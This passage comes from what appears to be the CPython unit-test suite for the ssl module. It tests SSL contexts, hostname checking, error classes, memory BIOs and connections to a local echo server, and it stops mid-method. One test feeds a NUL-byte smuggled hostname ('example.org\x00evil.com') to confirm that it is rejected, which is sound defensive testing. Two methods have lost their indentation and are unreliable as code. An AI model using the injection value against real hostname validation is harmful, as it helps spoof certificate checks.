    self.assertEqual(context.cert_store_stats(), baseline)
def _assert_context_options(self, ctx):
    """Assert that *ctx* carries the options a default context should set.

    OP_NO_SSLv2 must always be present.  The remaining option constants
    are module-level values that are presumably 0 when the underlying
    OpenSSL build lacks them (the original guarded each with ``!= 0``),
    so only non-zero ones are checked.
    """
    self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
    # Collapse the four copy-pasted if-blocks into one data-driven loop.
    for option in (OP_NO_COMPRESSION, OP_SINGLE_DH_USE,
                   OP_SINGLE_ECDH_USE, OP_CIPHER_SERVER_PREFERENCE):
        if option != 0:
            self.assertEqual(ctx.options & option, option)
def test_create_default_context(self):
    """create_default_context() verifies peers for clients and accepts
    CA material as a file, a directory and raw PEM data."""
    # Default purpose: client-side server authentication.
    context = ssl.create_default_context()
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLS)
    self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
    self.assertTrue(context.check_hostname)
    self._assert_context_options(context)

    # CA material may be passed via cafile, capath and cadata at once.
    with open(SIGNING_CA) as ca_file:
        cadata = ca_file.read()
    context = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
                                         cadata=cadata)
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLS)
    self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
    self._assert_context_options(context)

    # Server-side contexts do not demand client certificates by default.
    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLS)
    self.assertEqual(context.verify_mode, ssl.CERT_NONE)
    self._assert_context_options(context)
def test__create_stdlib_context(self):
    """_create_stdlib_context() is permissive by default and honours the
    protocol / cert_reqs / check_hostname / purpose keywords."""
    # Defaults: no verification, no hostname checking.
    context = ssl._create_stdlib_context()
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLS)
    self.assertEqual(context.verify_mode, ssl.CERT_NONE)
    self.assertFalse(context.check_hostname)
    self._assert_context_options(context)

    # An explicit protocol is passed through unchanged.
    context = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLSv1)
    self.assertEqual(context.verify_mode, ssl.CERT_NONE)
    self._assert_context_options(context)

    # Verification and hostname checking can be switched on.
    context = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
                                         cert_reqs=ssl.CERT_REQUIRED,
                                         check_hostname=True)
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLSv1)
    self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
    self.assertTrue(context.check_hostname)
    self._assert_context_options(context)

    # purpose= only selects defaults; the protocol stays PROTOCOL_TLS.
    context = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
    self.assertEqual(context.protocol, ssl.PROTOCOL_TLS)
    self.assertEqual(context.verify_mode, ssl.CERT_NONE)
    self._assert_context_options(context)
def test_check_hostname(self):
    """check_hostname / verify_mode interaction.

    Enabling check_hostname on a CERT_NONE context auto-upgrades it to
    CERT_REQUIRED; CERT_OPTIONAL is preserved; and CERT_NONE cannot be
    set while check_hostname is enabled.  The assertions below form an
    order-dependent sequence of state transitions on one context.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
    self.assertFalse(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
    # Auto set CERT_REQUIRED
    ctx.check_hostname = True
    self.assertTrue(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_REQUIRED
    self.assertFalse(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    # Changing verify_mode does not affect check_hostname
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.check_hostname = False
    self.assertFalse(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
    # Auto set
    ctx.check_hostname = True
    self.assertTrue(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_OPTIONAL
    ctx.check_hostname = False
    self.assertFalse(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
    # keep CERT_OPTIONAL
    ctx.check_hostname = True
    self.assertTrue(ctx.check_hostname)
    self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
    # Cannot set CERT_NONE with check_hostname enabled
    with self.assertRaises(ValueError):
        ctx.verify_mode = ssl.CERT_NONE
    ctx.check_hostname = False
    self.assertFalse(ctx.check_hostname)
    ctx.verify_mode = ssl.CERT_NONE
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
@unittest.skipUnless(IS_OPENSSL_1_1_1, "Test requires OpenSSL 1.1.1")
def test_num_tickets(self):
    """SSLContext.num_tickets: settable on server contexts only.

    Renamed from the original ``test_num_tickest`` to fix the typo in
    the method name; unittest still discovers it via the ``test_``
    prefix, so no runner configuration changes.
    """
    # Server-side contexts default to two session tickets and accept
    # any non-negative integer.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    self.assertEqual(ctx.num_tickets, 2)
    ctx.num_tickets = 1
    self.assertEqual(ctx.num_tickets, 1)
    ctx.num_tickets = 0
    self.assertEqual(ctx.num_tickets, 0)
    with self.assertRaises(ValueError):
        ctx.num_tickets = -1
    with self.assertRaises(TypeError):
        ctx.num_tickets = None

    # Client-side contexts expose the default but refuse assignment.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    self.assertEqual(ctx.num_tickets, 2)
    with self.assertRaises(ValueError):
        ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
    """Tests for the SSLError exception: str(), errno, library/reason
    attributes, subclass selection, and server_hostname validation."""

    def test_str(self):
        # The str() of a SSLError doesn't include the errno
        e = ssl.SSLError(1, "foo")
        self.assertEqual(str(e), "foo")
        self.assertEqual(e.errno, 1)
        # Same for a subclass
        e = ssl.SSLZeroReturnError(1, "foo")
        self.assertEqual(str(e), "foo")
        self.assertEqual(e.errno, 1)

    @unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
    def test_lib_reason(self):
        # Test the library and reason attributes
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        # Feeding a certificate where DH parameters are expected must
        # produce a PEM "no start line" error.
        with self.assertRaises(ssl.SSLError) as cm:
            ctx.load_dh_params(CERTFILE)
        self.assertEqual(cm.exception.library, 'PEM')
        self.assertEqual(cm.exception.reason, 'NO_START_LINE')
        s = str(cm.exception)
        self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)

    def test_subclass(self):
        # Check that the appropriate SSLError subclass is raised
        # (this only tests one of them)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        with socket.create_server(("127.0.0.1", 0)) as s:
            c = socket.create_connection(s.getsockname())
            c.setblocking(False)
            with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
                # Non-blocking handshake with no peer data available must
                # raise SSLWantReadError, not the base SSLError.
                with self.assertRaises(ssl.SSLWantReadError) as cm:
                    c.do_handshake()
                s = str(cm.exception)
                self.assertTrue(s.startswith("The operation did not complete (read)"), s)
                # For compatibility
                self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)

    def test_bad_server_hostname(self):
        # Empty, leading-dot, and NUL-containing hostnames are rejected
        # before any connection is attempted.
        ctx = ssl.create_default_context()
        with self.assertRaises(ValueError):
            ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
                         server_hostname="")
        with self.assertRaises(ValueError):
            ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
                         server_hostname=".example.org")
        with self.assertRaises(TypeError):
            ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
                         server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
    """Behavioral tests for ssl.MemoryBIO: FIFO reads and writes, EOF
    signalling, the ``pending`` counter, and accepted argument types."""

    def test_read_write(self):
        buf = ssl.MemoryBIO()
        # A write is drained completely by the next unsized read ...
        buf.write(b'foo')
        self.assertEqual(buf.read(), b'foo')
        self.assertEqual(buf.read(), b'')
        # ... successive writes are coalesced ...
        buf.write(b'foo')
        buf.write(b'bar')
        self.assertEqual(buf.read(), b'foobar')
        self.assertEqual(buf.read(), b'')
        # ... and a sized read consumes only that many bytes.
        buf.write(b'baz')
        self.assertEqual(buf.read(2), b'ba')
        self.assertEqual(buf.read(1), b'z')
        self.assertEqual(buf.read(1), b'')

    def test_eof(self):
        buf = ssl.MemoryBIO()
        self.assertFalse(buf.eof)
        self.assertEqual(buf.read(), b'')
        self.assertFalse(buf.eof)
        buf.write(b'foo')
        self.assertFalse(buf.eof)
        # write_eof() only becomes visible once buffered data is drained.
        buf.write_eof()
        self.assertFalse(buf.eof)
        self.assertEqual(buf.read(2), b'fo')
        self.assertFalse(buf.eof)
        self.assertEqual(buf.read(1), b'o')
        self.assertTrue(buf.eof)
        self.assertEqual(buf.read(), b'')
        self.assertTrue(buf.eof)

    def test_pending(self):
        buf = ssl.MemoryBIO()
        self.assertEqual(buf.pending, 0)
        buf.write(b'foo')
        self.assertEqual(buf.pending, 3)
        # Draining one byte at a time decrements the counter ...
        for drained in range(1, 4):
            buf.read(1)
            self.assertEqual(buf.pending, 3 - drained)
        # ... and each one-byte write increments it again.
        for added in range(1, 4):
            buf.write(b'x')
            self.assertEqual(buf.pending, added)
        buf.read()
        self.assertEqual(buf.pending, 0)

    def test_buffer_types(self):
        # Any bytes-like object is accepted for writing.
        buf = ssl.MemoryBIO()
        buf.write(b'foo')
        self.assertEqual(buf.read(), b'foo')
        buf.write(bytearray(b'bar'))
        self.assertEqual(buf.read(), b'bar')
        buf.write(memoryview(b'baz'))
        self.assertEqual(buf.read(), b'baz')

    def test_error_types(self):
        # Non-bytes-like arguments are rejected with TypeError.
        buf = ssl.MemoryBIO()
        for bad_value in ('foo', None, True, 1):
            self.assertRaises(TypeError, buf.write, bad_value)
class SSLObjectTests(unittest.TestCase):
    """Tests for ssl.SSLObject driven entirely through memory BIOs."""

    def test_private_init(self):
        # SSLObject must be created via SSLContext.wrap_bio(), never
        # instantiated directly.
        bio = ssl.MemoryBIO()
        with self.assertRaisesRegex(TypeError, "public constructor"):
            ssl.SSLObject(bio, bio)

    def test_unwrap(self):
        # Drive a full handshake and a bidirectional close-notify exchange
        # between two in-memory SSLObjects.
        client_ctx, server_ctx, hostname = testing_context()
        c_in = ssl.MemoryBIO()
        c_out = ssl.MemoryBIO()
        s_in = ssl.MemoryBIO()
        s_out = ssl.MemoryBIO()
        client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
        server = server_ctx.wrap_bio(s_in, s_out, server_side=True)

        # Loop on the handshake for a bit to get it settled
        for _ in range(5):
            try:
                client.do_handshake()
            except ssl.SSLWantReadError:
                pass
            if c_out.pending:
                s_in.write(c_out.read())
            try:
                server.do_handshake()
            except ssl.SSLWantReadError:
                pass
            if s_out.pending:
                c_in.write(s_out.read())

        # Now the handshakes should be complete (don't raise WantReadError)
        client.do_handshake()
        server.do_handshake()

        # Now if we unwrap one side unilaterally, it should send close-notify
        # and raise WantReadError:
        with self.assertRaises(ssl.SSLWantReadError):
            client.unwrap()

        # But server.unwrap() does not raise, because it reads the client's
        # close-notify:
        s_in.write(c_out.read())
        server.unwrap()

        # And now that the client gets the server's close-notify, it doesn't
        # raise either.
        c_in.write(s_out.read())
        client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
    """Tests that connect to a simple server running in the background"""

    def setUp(self):
        # Start a fresh ThreadedEchoServer per test and make sure it is
        # torn down even if the test fails.
        server = ThreadedEchoServer(SIGNED_CERTFILE)
        self.server_addr = (HOST, server.port)
        server.__enter__()
        self.addCleanup(server.__exit__, None, None, None)

    def test_connect(self):
        # Unverified connection: getpeercert() returns an empty dict.
        with test_wrap_socket(socket.socket(socket.AF_INET),
                              cert_reqs=ssl.CERT_NONE) as s:
            s.connect(self.server_addr)
            self.assertEqual({}, s.getpeercert())
            self.assertFalse(s.server_side)

        # this should succeed because we specify the root cert
        with test_wrap_socket(socket.socket(socket.AF_INET),
                              cert_reqs=ssl.CERT_REQUIRED,
                              ca_certs=SIGNING_CA) as s:
            s.connect(self.server_addr)
            self.assertTrue(s.getpeercert())
            self.assertFalse(s.server_side)

    def test_connect_fail(self):
        # This should fail because we have no verification certs. Connection
        # failure crashes ThreadedEchoServer, so run this in an independent
        # test method.
        s = test_wrap_socket(socket.socket(socket.AF_INET),
                             cert_reqs=ssl.CERT_REQUIRED)
        self.addCleanup(s.close)
        self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                               s.connect, self.server_addr)

    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        s = test_wrap_socket(socket.socket(socket.AF_INET),
                             cert_reqs=ssl.CERT_REQUIRED,
                             ca_certs=SIGNING_CA)
        self.addCleanup(s.close)
        self.assertEqual(0, s.connect_ex(self.server_addr))
        self.assertTrue(s.getpeercert())

    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        s = test_wrap_socket(socket.socket(socket.AF_INET),
                             cert_reqs=ssl.CERT_REQUIRED,
                             ca_certs=SIGNING_CA,
                             do_handshake_on_connect=False)
        self.addCleanup(s.close)
        s.setblocking(False)
        rc = s.connect_ex(self.server_addr)
        # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
        self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
        # Wait for connect to finish
        select.select([], [s], [], 5.0)
        # Non-blocking handshake
        while True:
            try:
                s.do_handshake()
                break
            except ssl.SSLWantReadError:
                select.select([s], [], [], 5.0)
            except ssl.SSLWantWriteError:
                select.select([], [s], [], 5.0)
        # SSL established
        self.assertTrue(s.getpeercert())

    def test_connect_with_context(self):
        # Same as test_connect, but with a separately created context
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
            s.connect(self.server_addr)
            self.assertEqual({}, s.getpeercert())
        # Same with a server hostname
        with ctx.wrap_socket(socket.socket(socket.AF_INET),
                             server_hostname="dummy") as s:
            s.connect(self.server_addr)
        ctx.verify_mode = ssl.CERT_REQUIRED
        # This should succeed because we specify the root cert
        ctx.load_verify_locations(SIGNING_CA)
        with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
            s.connect(self.server_addr)
            cert = s.getpeercert()
            self.assertTrue(cert)

    def test_connect_with_context_fail(self):
        # This should fail because we have no verification certs. Connection
        # failure crashes ThreadedEchoServer, so run this in an independent
        # test method.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        ctx.verify_mode = ssl.CERT_REQUIRED
        s = ctx.wrap_socket(socket.socket(socket.AF_INET))
        self.addCleanup(s.close)
        self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                               s.connect, self.server_addr)

    def test_connect_capath(self):
        # Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm has been changed between
        # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        ctx.verify_mode = ssl.CERT_REQUIRED
        ctx.load_verify_locations(capath=CAPATH)
        with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
            s.connect(self.server_addr)
            cert = s.getpeercert()
            self.assertTrue(cert)

        # Same with a bytes `capath` argument
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        ctx.verify_mode = ssl.CERT_REQUIRED
        ctx.load_verify_locations(capath=BYTES_CAPATH)
        with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
            s.connect(self.server_addr)
            cert = s.getpeercert()
            self.assertTrue(cert)

    def test_connect_cadata(self):
        # Verify server certificates using in-memory CA data, both as
        # PEM text and as DER bytes.
        with open(SIGNING_CA) as f:
            pem = f.read()
        der = ssl.PEM_cert_to_DER_cert(pem)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        ctx.verify_mode = ssl.CERT_REQUIRED
        ctx.load_verify_locations(cadata=pem)
        with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
            s.connect(self.server_addr)
            cert = s.getpeercert()
            self.assertTrue(cert)

        # same with DER
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        ctx.verify_mode = ssl.CERT_REQUIRED
        ctx.load_verify_locations(cadata=der)
        with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
            s.connect(self.server_addr)
            cert = s.getpeercert()
            self.assertTrue(cert)

    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        ss = test_wrap_socket(socket.socket(socket.AF_INET))
        ss.connect(self.server_addr)
        fd = ss.fileno()
        f = ss.makefile()
        f.close()
        # The fd is still open
        os.read(fd, 0)
        # Closing the SSL socket should close the fd too
        ss.close()
        gc.collect()
        with self.assertRaises(OSError) as e:
            os.read(fd, 0)
        self.assertEqual(e.exception.errno, errno.EBADF)

    def test_non_blocking_handshake(self):
        # Drive the handshake manually on a non-blocking socket, retrying
        # on WANT_READ / WANT_WRITE until it completes.
        s = socket.socket(socket.AF_INET)
        s.connect(self.server_addr)
        s.setblocking(False)
        s = test_wrap_socket(s,
                             cert_reqs=ssl.CERT_NONE,
                             do_handshake_on_connect=False)
        self.addCleanup(s.close)
        count = 0
        while True:
            try:
                count += 1
                s.do_handshake()
                break
            except ssl.SSLWantReadError:
                select.select([s], [], [])
            except ssl.SSLWantWriteError:
                select.select([], [s], [])
        if support.verbose:
            sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)

    def test_get_server_certificate(self):
        _test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)

    def test_get_server_certificate_fail(self):
        # Connection failure crashes ThreadedEchoServer, so run this in an
        # independent test method
        _test_get_server_certificate_fail(self, *self.server_addr)

    def test_ciphers(self):
        with test_wrap_socket(socket.socket(socket.AF_INET),
                              cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
            s.connect(self.server_addr)
        with test_wrap_socket(socket.socket(socket.AF_INET),
                              cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
            s.connect(self.server_addr)
        # Error checking can happen at instantiation or when connecting
        with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
            with socket.socket(socket.AF_INET) as sock:
                s = test_wrap_socket(sock,
                                     cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
                s.connect(self.server_addr)

    def test_get_ca_certs_capath(self):
        # capath certs are loaded on request
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.load_verify_locations(capath=CAPATH)
        self.assertEqual(ctx.get_ca_certs(), [])
        with ctx.wrap_socket(socket.socket(socket.AF_INET),
                             server_hostname='localhost') as s:
            s.connect(self.server_addr)
            cert = s.getpeercert()
            self.assertTrue(cert)
        self.assertEqual(len(ctx.get_ca_certs()), 1)

    @needs_sni
    def test_context_setget(self):
        # Check that the context of a connected socket can be replaced.
        ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx1.load_verify_locations(capath=CAPATH)
        ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx2.load_verify_locations(capath=CAPATH)
        s = socket.socket(socket.AF_INET)
        with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
            ss.connect(self.server_addr)
            self.assertIs(ss.context, ctx1)
            self.assertIs(ss._sslobj.context, ctx1)
            ss.context = ctx2
            self.assertIs(ss.context, ctx2)
            self.assertIs(ss._sslobj.context, ctx2)

    def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple IO loop. Call func(*args) depending on the error we get
        # (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
        timeout = kwargs.get('timeout', 10)
        deadline = time.monotonic() + timeout
        count = 0
        while True:
            if time.monotonic() > deadline:
                self.fail("timeout")
            # NOTE(review): this local deliberately shadows the errno
            # module within the loop body.
            errno = None
            count += 1
            try:
                ret = func(*args)
            except ssl.SSLError as e:
                if e.errno not in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    raise
                errno = e.errno
            # Get any data from the outgoing BIO irrespective of any error, and
            # send it to the socket.
            buf = outgoing.read()
            sock.sendall(buf)
            # If there's no error, we're done. For WANT_READ, we need to get
            # data from the socket and put it in the incoming BIO.
            if errno is None:
                break
            elif errno == ssl.SSL_ERROR_WANT_READ:
                buf = sock.recv(32768)
                if buf:
                    incoming.write(buf)
                else:
                    incoming.write_eof()
        if support.verbose:
            sys.stdout.write("Needed %d calls to complete %s().\n"
                             % (count, func.__name__))
        return ret

    def test_bio_handshake(self):
        # Full handshake over memory BIOs against the background server.
        sock = socket.socket(socket.AF_INET)
        self.addCleanup(sock.close)
        sock.connect(self.server_addr)
        incoming = ssl.MemoryBIO()
        outgoing = ssl.MemoryBIO()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        self.assertTrue(ctx.check_hostname)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.load_verify_locations(SIGNING_CA)
        sslobj = ctx.wrap_bio(incoming, outgoing, False,
                              SIGNED_CERTFILE_HOSTNAME)
        self.assertIs(sslobj._sslobj.owner, sslobj)
        # Before the handshake, no cipher/version/peercert is available.
        self.assertIsNone(sslobj.cipher())
        self.assertIsNone(sslobj.version())
        self.assertIsNotNone(sslobj.shared_ciphers())
        self.assertRaises(ValueError, sslobj.getpeercert)
        if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
            self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
        self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
        # After the handshake, all of these must be populated.
        self.assertTrue(sslobj.cipher())
        self.assertIsNotNone(sslobj.shared_ciphers())
        self.assertIsNotNone(sslobj.version())
        self.assertTrue(sslobj.getpeercert())
        if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
            self.assertTrue(sslobj.get_channel_binding('tls-unique'))
        try:
            self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
        except ssl.SSLSyscallError:
            # If the server shuts down the TCP connection without sending a
            # secure shutdown message, this is reported as SSL_ERROR_SYSCALL
            pass
        self.assertRaises(ssl.SSLError, sslobj.write, b'foo')

    def test_bio_read_write_data(self):
        # Echo a payload through a BIO-wrapped connection.
        sock = socket.socket(socket.AF_INET)
        self.addCleanup(sock.close)
        sock.connect(self.server_addr)
        incoming = ssl.MemoryBIO()
        outgoing = ssl.MemoryBIO()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
        ctx.verify_mode = ssl.CERT_NONE
        sslobj = ctx.wrap_bio(incoming, outgoing, False)
        self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
        req = b'FOO\n'
        self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
        buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
        # The echo server lowercases what it receives.
        self.assertEqual(buf, b'foo\n')
        self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
    """Tests that need real outbound network access; each is guarded by
    support.transient_internet() so transient failures become skips."""

    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet(REMOTE_HOST):
            s = test_wrap_socket(socket.socket(socket.AF_INET),
                                 cert_reqs=ssl.CERT_REQUIRED,
                                 do_handshake_on_connect=False)
            self.addCleanup(s.close)
            # Absurdly small timeout to force the EAGAIN/EWOULDBLOCK path.
            s.settimeout(0.0000001)
            rc = s.connect_ex((REMOTE_HOST, 443))
            if rc == 0:
                self.skipTest("REMOTE_HOST responded too quickly")
            self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))

    @unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
    def test_get_server_certificate_ipv6(self):
        with support.transient_internet('ipv6.google.com'):
            _test_get_server_certificate(self, 'ipv6.google.com', 443)
            _test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
    """Fetch host:port's certificate, unverified and then verified against
    *cert*, failing *test* if either fetch comes back empty."""
    address = (host, port)
    pem = ssl.get_server_certificate(address)
    if not pem:
        test.fail("No server certificate on %s:%s!" % (host, port))

    pem = ssl.get_server_certificate(address, ca_certs=cert)
    if not pem:
        test.fail("No server certificate on %s:%s!" % (host, port))
    if support.verbose:
        sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
def _test_get_server_certificate_fail(test, host, port):
    """Fetching host:port's certificate verified against the unrelated
    CERTFILE CA must raise ssl.SSLError; success fails *test*."""
    try:
        pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
    except ssl.SSLError as exc:
        # should fail
        if support.verbose:
            sys.stdout.write("%s\n" % exc)
    else:
        test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
    # Echo server used throughout the test suite: lowercases each line it
    # receives and sends it back, and understands a handful of control
    # commands (b'over', b'STARTTLS', b'ENDTLS', b'CB tls-unique', b'PHA',
    # b'HASCERT', b'GETCERT').  One ConnectionHandler thread per client.

    class ConnectionHandler(threading.Thread):

        """A mildly complicated class, because we want it to work both
        with and without the SSL wrapper around the socket connection, so
        that we can test the STARTTLS functionality."""

        def __init__(self, server, connsock, addr):
            self.server = server
            self.running = False
            self.sock = connsock
            self.addr = addr
            self.sock.setblocking(1)
            # None while the connection is plaintext; set by wrap_conn().
            self.sslconn = None
            threading.Thread.__init__(self)
            self.daemon = True

        def wrap_conn(self):
            """Upgrade self.sock to TLS; return True on success, False if
            the handshake failed (the failure is recorded on the server)."""
            try:
                self.sslconn = self.server.context.wrap_socket(
                    self.sock, server_side=True)
                self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
                self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
            except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
                # We treat ConnectionResetError as though it were an
                # SSLError - OpenSSL on Ubuntu abruptly closes the
                # connection when asked to use an unsupported protocol.
                #
                # BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
                # tries to send session tickets after handshake.
                # https://github.com/openssl/openssl/issues/6342
                #
                # ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
                # tries to send session tickets after handshake when using WinSock.
                self.server.conn_errors.append(str(e))
                if self.server.chatty:
                    handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                self.running = False
                self.close()
                return False
            except (ssl.SSLError, OSError) as e:
                # OSError may occur with wrong protocols, e.g. both
                # sides use PROTOCOL_TLS_SERVER.
                #
                # XXX Various errors can have happened here, for example
                # a mismatching protocol version, an invalid certificate,
                # or a low-level bug. This should be made more discriminating.
                #
                # bpo-31323: Store the exception as string to prevent
                # a reference leak: server -> conn_errors -> exception
                # -> traceback -> self (ConnectionHandler) -> server
                self.server.conn_errors.append(str(e))
                if self.server.chatty:
                    handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                self.running = False
                self.server.stop()
                self.close()
                return False
            else:
                self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
                if self.server.context.verify_mode == ssl.CERT_REQUIRED:
                    cert = self.sslconn.getpeercert()
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                    cert_binary = self.sslconn.getpeercert(True)
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
                cipher = self.sslconn.cipher()
                if support.verbose and self.server.chatty:
                    sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
                    sys.stdout.write(" server: selected protocol is now "
                                     + str(self.sslconn.selected_npn_protocol()) + "\n")
                return True

        def read(self):
            # Read from whichever layer is currently active (TLS or plain).
            if self.sslconn:
                return self.sslconn.read()
            else:
                return self.sock.recv(1024)

        def write(self, bytes):
